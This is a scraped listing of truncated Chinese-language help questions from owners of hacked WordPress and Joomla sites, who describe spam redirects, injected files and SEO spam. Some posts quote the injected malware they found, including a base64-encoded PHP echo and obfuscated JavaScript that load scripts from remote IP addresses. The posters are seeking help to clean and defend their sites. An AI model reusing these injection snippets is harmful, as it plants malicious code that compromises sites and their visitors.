我们的网站正以一种奇怪的方式遭到攻击:在搜索结果页面上,谷歌显示的链接看起来像是指向我们网站上的页面,但它们直接指向一些可疑的伟哥销售网站。
我做了一些研究,在我们的网站(Nginx + Wordpress)上没有发现这些页面的踪迹。
我试着压缩了一些curl -X HEADER -i www.oursite.com/pilule-de-viagra/链接,并得到了以下结果:
HTTP/1.1 302 moved Temporarily
Date: Tue, 02 Feb 2016 13:46:17 GMT
Content-Type: text/html; charset=UTF-8
Cont
浏览 0提问于2016-02-02得票数 0
回答已采纳
当我试图访问我之前访问过的一个没有问题的网站时,奇怪的是,我被重新定向到了一些垃圾信息交友网站。不想再尝试,我使用wheregoes.com来跟踪重定向,它显示了203元刷新重定向,然后是301重定向,然后是302重定向到最终目的地。我研究了这些状态代码,但我不确定203重定向是否“坏”。
有没有办法判断这个网站是否被黑了?它应该导致Python库的文档,如果是这样的话,我想通知站点所有者。不过,如果没有必要的话,我不想发出虚假的警报。我也想了解一下这一点!
我可以提供更多的信息或跟踪链接(从wheregoes.com,而不是垃圾邮件网站),如果绝对必要,我只是不想宣传的实际网站,除非有必要避
浏览 0提问于2021-02-07得票数 0
回答已采纳
两个问题合二为一。最近在我的Wordpress安装(域安装)的根目录中引入了一个php文件。它没有干扰我的网站,但显然是利用域名地址来宣传广告。
1)有人如何将文件粘贴到我的根目录中?怎样才能阻止这种情况再次发生?
2)该文件包含非常准确的这段代码。
谢谢!
浏览 0提问于2012-03-13得票数 0
每次我打开我的网站,它会自动将我重定向到另一个网站"www.oxxtm.com“。
我发现在index.php和load.php中插入了一段代码
<?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzQ1LjM0LjEwMy42OS9pbWFnZXMvd3AtbG9nby5qcyI+PC9zY3JpcHQ+");
?>
我一直在擦掉它,但它总是回来。
到目前为止,这些都是我做的事情。管理wp- -Changed密码-installed防恶意软件插
浏览 1提问于2016-01-21得票数 0
1回答
我建立了一个简单的PHP网站。谷歌称这是一个钓鱼网站。我的PHP代码中有什么东西能让Google Chrome认为我的网站是一个钓鱼网站,我该如何解决这个问题呢?我收集用户的IP地址,以防止在我拥有的投票系统上进行多次投票。这可能是问题所在吗?
浏览 3提问于2013-09-22得票数 0
所以我有一个wordpress网站,在我的网站导航中添加了一个恶意链接,但当我登录时,它就消失了,我在代码中根本找不到它的踪迹。我想知道以前是否有人遇到过这个问题,以及他们是如何解决这个问题的。
浏览 1提问于2015-05-06得票数 0
我正在开发的一个网站的顶部有一些文字,上面写着...Thông tin Tièu düng ng-Ti düng thóng minh fashionshop
它指向这个网站..。
http://diendannguoitieudung.com/
我正在做一个以罗莎为主题的wordpress网站。
我似乎找不到删除页面顶部文字的方法了吗?如有任何帮助,我将不胜感激。
浏览 2提问于2015-11-25得票数 0
1回答
网站所有者推迟更新的网站已经被ransomware破坏了。这种情况引起了许多问题。谷歌搜索并没有给出任何答案。服务器在一个大学系统中,他们把东西锁得很紧。
有没有任何关于Drupal网站的赎金感染率的统计数据,尤指。与其他系统相比?
什么是Drupal网站最常见的部分,是赎金妥协的漏洞。具体模块,Drupal核心,登录功能,Apache服务器功能?
浏览 0提问于2016-03-22得票数 0
1回答
作为一种爱好,我发现从XSS到SQLi到LFI等安全漏洞都存在于随机网站中。(我没有剥削他们)。我决定做得更多,我想创建一个由黑客组成的志愿者小组,他们将发现漏洞并向网站报告。
我发现了两个“问题”:
虽然我没有利用漏洞,但我是否会因为向网站报告漏洞而陷入法律困境?
我在哪里可以找到其他非恶意黑客?
该组织将完全以志愿者为基础,并将是完全非恶意的,我们不会接受客户或应要求进行测试。网站将是完全随机的;没有特定的网站将成为目标,测试将在网站的同意或不知情的情况下进行。如果发现了一个漏洞,就会通知该站点。如果没有,我们就会继续前进。
我还应该关心其他什么吗?
如果问错了地点,我很抱歉,但我不知道该
浏览 0提问于2012-04-07得票数 6
回答已采纳
我的网站标题已更改为"darkoct02“。我的网站是wordpress。我不知道它是从哪里来的,谁知道它是什么?我搜索google和我发现很多网站都有这个标题
浏览 8提问于2022-06-02得票数 -4
1回答
我有一个反应-拉拉的网站。
谷歌一直在缓存一些不应该放在第一位的随机页面。而且,它们看起来像其他人的eCommerce页面。
检查这个缓存的页面链接http://webcache.googleusercontent.com/search?q=cache:1tS6wPyBv0AJ:amitkk.com/it+&cd=53&hl=en&ct=clnk&gl=in
此外,您还可以在https://www.google.com/search?q=site%3Aamitkk.com&rlz=1C1SQJL_enIN819IN819&oq=site&
浏览 0提问于2020-04-05得票数 1
我刚吃完晚饭回到我的网站,却找不到仪表板上列出的任何帖子。
在四处窥探之后,我发现我的.htaccess文件被修改了,一些新文件被添加到我的主目录中。我删除了.htaccess代码和文件(它们都是从PE开始的)。
我看到在过去的一个小时里,wp.org论坛网站上已经发布了一些关于这个问题的帖子。
还有其他人对此有意见吗?还有什么代码要我删除吗?
谢谢。
浏览 0提问于2010-12-08得票数 0
回答已采纳
有一个HTTP网站(而不是HTTPS),当URL被直接输入地址栏时,或者当其他网站/应用程序(如Reddit、Facebook和不和谐)点击链接时,它工作得非常好。
例外是主要的搜索引擎:谷歌,雅虎和必应。当点击这些网站之一,它被重定向到一个欺诈药房网站与许多不同的域名之一。这种情况发生在Chrome、Firefox和Edge中;它也发生在Android智能手机上。(Bing只在Chrome中这样做,在Firefox和Edge中运行得很好。)这个问题发生在许多不同设备上的多个人身上。
有趣的是,其他搜索引擎(道奇、百度、问询、DuckDuckGo、Yandex等)好像挺好的。
造成这种行为的原
浏览 0提问于2021-05-02得票数 1
回答已采纳
今天,我们注意到,我们的一个网站已经开始显示随机的谷歌广告在我们的网站上,当我们没有添加任何谷歌广告到我们的网站。
如果有人能帮忙,万一他们遇到这种情况,我将不胜感激。
我不确定在这一点上,如果网站被黑客入侵或共享主机被破坏。
在网站上删除这些广告时,我应该遵循的任何要点或步骤
浏览 0提问于2022-04-21得票数 0
该网站抛出了500个错误。我可以看到在所有wordpress核心文件夹中生成的frmtmp.php文件。当我删除这些文件的时候,它们还会不断地回来。
浏览 2提问于2016-04-26得票数 0
回答已采纳
1回答
可能重复: 我的服务器被黑客入侵
在日志中,我发现那个网站被黑客扫描了几个小时,但我认为真正的黑客攻击只有几分钟。
他不知何故发现了我所有的文件--甚至没有缓存任何地方的文件夹和文件--比如robots.txt,或者甚至没有看到google.com --它只是我创建的随机文件名--我确信他不知道它们,所以他怎么能找到它们呢?
他的另一个窍门是,他找到了我用来上传图片到主页滑块的php文件,他上传了他的文件让我们称之为"hack.jpg“通过它。有趣的是,"hack.jpg“是几行php脚本,可以上传更多的文件。而且,他能够以php脚本的形式运行hack.jpg文件,而不需要将
浏览 0提问于2012-07-24得票数 -3
1回答
我有一些机器人问题,我发现他们的ASN和它来自网站托管提供商。不是ISP的。例如:
赫茨纳: AS24940
数字海洋: AS14061
AMAZON: AS14618
如果整个ASN属于主机提供商,那么禁止它们安全吗?这里面大概有200万IP。我不想禁止合法访客。
浏览 0提问于2019-10-21得票数 2
回答已采纳
1回答
我最近向adwords提交了我的网站,由于恶意软件或链接而被拒绝。在www.ws30.coinhive.com中检测到的链接。
我已经扫描了我的wordpress网站使用插件,如wordfence,sucuri等,但似乎没有删除恶意链接。我是一个新手,我用一个页面生成器来制作这个网站,所以我没有编码知识。
你能建议分步,我在哪里可以找到这个链接并删除它?有youtube视频吗?我急需帮助。
浏览 0提问于2018-04-14得票数 0
最近,我需要在我的博客网站上更改我的计数器代码。这就是为什么一些攻击者使用程序或其他任何手段操纵我文章的计数器号。
他们可以在一天内把计数器增加到4000台。所以我改变了计数器算法。现在我用的是一个基于IP地址的计数器。但我对此有个疑问。我知道$_SERVER['REMOTE_ADDR']给出了用户查看当前页面的IP地址。
我从:那里得到了这个解释。但是这个命令没有给我用户的IP地址。它总是给我只给hosting IP address。为什么?
有人能解释一下这种情况吗?幸运的是,我从github中找到了一个代码片段,我可以使用这个新计数器。()
为什么只有$_SERVER[&
浏览 5提问于2014-12-15得票数 0
回答已采纳
在我的WordPress博客上报告了结构化数据问题。当我点击那些URL时,我会被重定向到一个加拿大药房网站(这是一个垃圾网站)。
但是,如果我在浏览器中复制粘贴该URL,那么我可以轻松地打开该站点。
我检查了WordPress管理员,也做了恶意软件扫描。现场似乎运转良好。我还更新了插件,并更改为默认主题。但我还是得到了同样的结果。
有什么不对的?谷歌正在搜索加拿大药房网站,而不是我的网站。
请建议一下。
浏览 0提问于2020-02-24得票数 0
回答已采纳
我不再能够访问一个Wordpress网站的管理面板。两天前,我添加了一个插件,加载了一些新的内容,一切都很好。客户端加载了一些常规的博客文章,而今天,它不再工作了。
首先,错误本身--:
我转到URL:mydomain.com/wp-admin,浏览器重定向到:mydomain.com/wp-login.php?redirect_to=http%3A%2F%2Fmydomain.com%2Fwp-admin%2F&reauth=1
错误消息说:
未找到
在此服务器上找不到请求的URL /母亲/18/readf.php。
此外,在尝试使用ErrorDocument处理请求时遇到了一个4
浏览 1提问于2015-04-30得票数 2
1回答
我的wordpress网站突然通过wp-config.php被黑了。我从来没听说过这种攻击。当我扫描我的站点时,wpscan警告您注意以下错误:
📷
我怎样才能保护我的网站免受这次攻击?救命求你了!提前感谢!
浏览 0提问于2014-08-21得票数 1
当我在谷歌上搜索我的网站“mikegrossmanconsulting.com”时,我的URL mikegrossmanconsulting.com的结果包含了类似于垃圾邮件的信息。(页面标题和描述包含垃圾短语。)我已经附加了一个屏幕抓取与垃圾文本突出显示。我在我的网站上查看,没有提到“柏拉图”在任何地方。请告诉我如何处理垃圾邮件。
谢谢!
📷
浏览 0提问于2018-08-15得票数 1
1回答
乔姆拉q.
我试图更新我的Joomla网站,但失败了,我得到了一个基本的html版本的我的网站。我试图通过在根文件夹中提取一个以前版本的Joomla来降级。当这个失败的时候,我又试图用同样的方式改变它。
这给了我一个在管理端和前端的白色屏幕。在遵循最初的几个步骤之后,
我终于得到了这个错误:
*分析错误:语法错误,意外的'ini_set‘(T_STRING),期望函数(T_FUNCTION)在/home/*/public_html/第98*行中(星号添加)
浏览 0提问于2018-10-08得票数 0
2回答
有时,我所有网站的网址都会重定向到垃圾网址。我猜javascript文件可以做到这一点。
我不知道哪里可以找到,什么解决方案可能是最好的,或者至少阻止这些重定向
谢谢
浏览 3提问于2018-07-10得票数 0
近5年来,我一直在WordPress工作。但到目前为止,我还没有找到保护WordPress站点的标准解决方案。
我有一个客户托管帐户,它有11个WordPress网站,几乎每年都会被黑客攻击。即使是最后,我也不得不离开旅馆,否则他们就会因为这个而暂停帐户。现在我买了一个新的主机,我不希望它发生了一次又一次。
到目前为止,我所做的是保护我的网站,我已经使用了"Wordfence“插件,并正确设置它。试图隐藏我的wordpress安装使用“隐藏我的Wp”插件。已在Wordfence设置中将登录尝试设置为5,可以帮助它防止Ddos攻击。总是使用更新版本的插件和主题和WordPress核心。通
浏览 0提问于2017-10-30得票数 0
回答已采纳
我有一个wordpress网站,最近很奇怪。似乎数据库有时会自动回滚几个小时。我注意到它至少发生了四次。
当我更新到wordpress 3.5时,过了一小段时间,也许30-60分钟,我注意到要升级的nag又回来了。我第二次运行了升级,尽管我确信我已经升级了。
我添加了一个新的类别,并在我的一个侧边栏上更改了一个小部件,结果发现我的更改在第二天就消失了,我不得不重新做它们。
昨天我又加了一个帖子,和它在不同的地方连在一起,几个小时后才回来,发现那个帖子不见了。我从记忆中重写了这篇文章,并把它放回到了网站上。
今天早上当我去这个网站的时候,原来的帖子回来了,而我从记忆中重新创造出来
浏览 1提问于2012-12-19得票数 1
我有一个网站,thebleudoor.com。它由雅虎主持。它每天有2000到3000次点击量,而且已经持续了至少5年。
几个月前,作为该网站的管理员,我开始收到来自新创建的电子邮件(如d4f7a91f9@thebleudoor.com )的电子邮件。雅虎只为我的帐户显示了两封电子邮件。他们说他们什么也做不了。
现在,我的“垃圾邮件入侵电子邮件帐户”正在收到垃圾邮件。他们没有改变或使用我的网站,电子邮件或银行信息,只是我的网站的好名声。有什么我能做的吗?我需要担心吗?
改变我的供货商不会有什么帮助吧?
浏览 0提问于2012-10-11得票数 2
我在清理我被黑客入侵的WordPress网站时,在index.php中发现了不寻常的代码。
这是用来黑我网站的代码吗?或者它来自一个插件?
浏览 19提问于2021-05-16得票数 0
今天,我在google尝试了site:mysite.com,并注意到我有用urls索引的页面,比如不应该在那里,而不是
mysite.com/item/123/apple_wifi_review
我有:
mysite.com/item/123/children.Also
这一页去到项目编号123在我的网站无论如何,但我不知道谷歌从哪里得到这个网址。
更糟糕的是,我可以在谷歌上看到这个网址:
mysite.com/redirectUrl.php?elementId=494
如果我点击到我的网站上的“找不到的页面”,但是google缓存显示属于另一个站点的页面。
浏览 0提问于2017-07-12得票数 0
回答已采纳
1回答
当在地址栏中输入相同的URL时,怎么可能导致一个不同的网站,当在Google中搜索时会导致另一个网站呢?
示例:
如果您在地址栏中键入mdgpartners.com,它将导致正确的网站。
如果您在Google中搜索mdg partners,然后单击第一个链接(使用相同的mdgpartners.com URL ),它将导致垃圾邮件/垃圾网站。
域名是由GoDaddy注册的原始网站,反向查找谷歌的DNS导致正确的IP地址。但搜索过程中的链接是混乱的。
怎样才能解决这个问题?
浏览 0提问于2017-08-01得票数 1
该网站是视频-de-musica.com,这是一个简单的wordpress博客音乐视频。不知怎么的,子域stats.visual-de-musica.com充满了垃圾邮件,我记得为pwiki统计数据设置了域,但后来卸载了它,我不记得它发生了什么事。
这是一个垃圾邮件页面stats.visual-de-musica.com/aal-0exe.htm的例子。
当你在谷歌上搜索可打印超人徽章蝙蝠侠,这是第一个结果,当你访问它时,你被重定向到一个“谷歌发现恶意软件可能被安装到你的计算机上,如果你继续”诈骗网站。
我已经尝试禁用所有插件,没有任何改变。
有谁知道发生了什么以及如何去除这个吗?
我正在下载
浏览 0提问于2011-04-24得票数 2
回答已采纳
对于文件,我有很多404错误,这些文件应该在/wp-include/文件夹中。
这使得网站和管理面板的某些部分无法使用(在编辑贴子页面中,它甚至不会加载tinymce编辑器)。
我有最新版本的wordpress 4.1和一些插件,我已经在其他网站上使用。
我试图禁用主题和插件,重新上传wp-管理和wp-包括通过ftp,但没有任何改变。也上传了一个干净的.htaccess,什么都没有。同样,通过恢复到一个较旧版本的wordpress。知道什么可以解决吗?在ftp中查看,文件夹在那里,文件权限被正确设置(755文件夹,644个文件)。但是里面的一切都是无法从布罗瑟那里得到的。
这个网站是:http
浏览 0提问于2015-02-16得票数 0
回答已采纳
在我的根index.php文件中,我已经看到这种情况发生了两次。我添加了这个东西
<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5=
浏览 1提问于2010-06-07得票数 0
回答已采纳
我的wordpress网站被黑了,一旦恢复,我似乎无法查看页脚。我已经检查了主题选项/小部件,设置似乎很好。
请就可能的原因和解决办法提出建议。
网站地址: www.boltonuniform.co.za
浏览 0提问于2017-02-22得票数 1
我经常在我的一个网站上出现这样的错误。这往往是随机发生在整个白天,任何一段时间,在夜间,当我不希望用户在网站上。
它总是来自不同的ip地址。
System.Web.HttpException:无效视图状态。at System.Web.UI.Page.DecryptStringWithIV(String s,IVType ivType) at System.Web.UI.Page.DecryptString(String s)
或
System.Security.Cryptography.CryptographicException:填充无效,无法删除。在System.Security
浏览 0提问于2009-06-01得票数 7
回答已采纳
这可能是一个广泛的话题,但我正在搜索和阅读,但无法消除我的疑虑,请提供答复或链接,从哪里我可以了解代码如何注入到WP的攻击者。
当点击谷歌搜索的网站名称时,它就会使用垃圾邮件链接。在做了一些扫描后,我发现我们使用的插件https://wordpress.org/plugins/pc-google-analytics/已经过时了。在wp-config.php中有一些代码,如下所示:
📷
这是不是意味着网站被黑了?
我执行了所有必要的更新或核心和插件等,并已通过确认我已经完全删除了一个WordPress黑客?
就是那种代码意味着网站被黑了。我们正在共享托管Bluehost。
我不确定该代码是否是主
浏览 0提问于2018-01-02得票数 1
回答已采纳
我对我的网站使用JA_Rasite模板:。但现在,当我在mobie上访问我的站点时,它会自动重定向到随机(不想要的)站点。有时是色情网站,有时是广告网站。有谁有解决这个问题的办法吗?
浏览 2提问于2013-01-16得票数 0
我经营一个灵感旅游网站,与色情无关。然而,谷歌网站管理员工具报告说,我网站上的许多不同页面显示了与色情相关的查询的前10名结果。这些网页上没有与色情有关的内容。
当我自己把查询放到Google搜索中时,我从来没有看到我的页面显示在搜索结果中。是什么开着这车?这是窃听器还是恶意的东西?
浏览 0提问于2013-10-07得票数 1
1回答
.htaccess文件是如何重写的?我的网站昨天工作得很好,但今天不能工作。我什么也没改变。.htaccess中有一些拒绝访问代码。我的网站被黑客入侵了?
浏览 0提问于2013-01-16得票数 0
我在我的网站上收到了这条消息,PHP警告:
要求-一次:无法访问第28行/home/sddalmac/public_html/index.php中的/home/sddalmac/public_html/includes/defines.php
还原defines.php文件后,站点可以正常工作几个小时,然后文件再次消失。用户和管理界面也是如此。服务器PHP版本为: 5.3.29
有人知道这个问题的解决办法吗?
浏览 2提问于2015-11-17得票数 1
今天我想问你一个非常重要的问题,如果我的WordPress网站https://thecodezine.com被黑了,或者我的jetpack插件安全被破坏了,我会失去一切吗?没办法回去了吗?我怎样才能保证所有文件的安全和安全。
浏览 0提问于2019-03-19得票数 0
2回答
我用来托管WordPress网站的共享服务器最近被黑客入侵,许多index.php文件、插件文件和上传文件都被删除了,而我的MySQL数据库却没有受到任何影响。但是,在从本地备份中恢复了所有这些之后,我遇到了一些奇怪的问题。
我的主页http://inversekarma.in没有完全加载-侧边栏和页脚都丢失了。如果我查看页面源代码,它就会在侧边栏的代码开始时结束。
我无法登录到仪表板。它会抛出一个500错误。
请帮我解决这个问题!
P.S.:在我从备份中恢复了文件之后,我在同一个域上有另一个WordPress博客,在http://inversekarma.in/photos上,它可以很好地工
浏览 0提问于2010-11-17得票数 1
回答已采纳
4回答
我主持的一个网站最近被黑了。索引页的底部添加了以下代码(就在关闭正文标记的上方):
<script language="javascript">document.write('<div style="font-family:Tahoma,Arial,Helvetica,sans-serif;font-size:12px;overflow:hidden;color:#FF0000;height:' + (325 * 3 - 974) + 'px;width:' + (18 * 786 - 14147) + '
浏览 0提问于2010-08-12得票数 1
1回答
我的网站似乎被黑了。当我登录到控制面板http://www.elqanah-news.com/wp-login.php时,它会进行重定向。
浏览 0提问于2017-07-27得票数 -2
我谷歌webgraphviz.com和前两个结果是:
📷
第一个重定向到一个药房网站,如何与第二个网站拥有相同的域名?我甚至怀疑这是一种伪造域,攻击者在其中使用类似的字符(例如,大写希腊语α)和A(大写英语a),但通过复制域并将其粘贴到非ASCII检查器 (我发现它只包含ASCII字符)来检查假字符。这怎么可能?
浏览 0提问于2021-06-07得票数 0
回答已采纳
在排名前十的网站中,90%的网站,如Facebook、Google、Yahoo、Youtube等,都会向一个名为MarkMonitor的域名注册机构注册域名。如果Markmonitor被黑客入侵,黑客可以重置服务器的名称,并有效地使它们无法访问或直接传输到网络钓鱼网站。
资料来源及其他资料:http://www.webdigi.co.uk/blog/2013/a-single-kill-switch-for-90-of-the-top-ten-websites/
这是潜在的风险吗?
Mark Monitor可以设置哪些安全限制来防止更改?
对于这些公司来说,做一个注册员本身(比如IBM)是否太
浏览 0提问于2013-04-10得票数 -2
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
腾讯会议活动推荐
腾讯云开发者
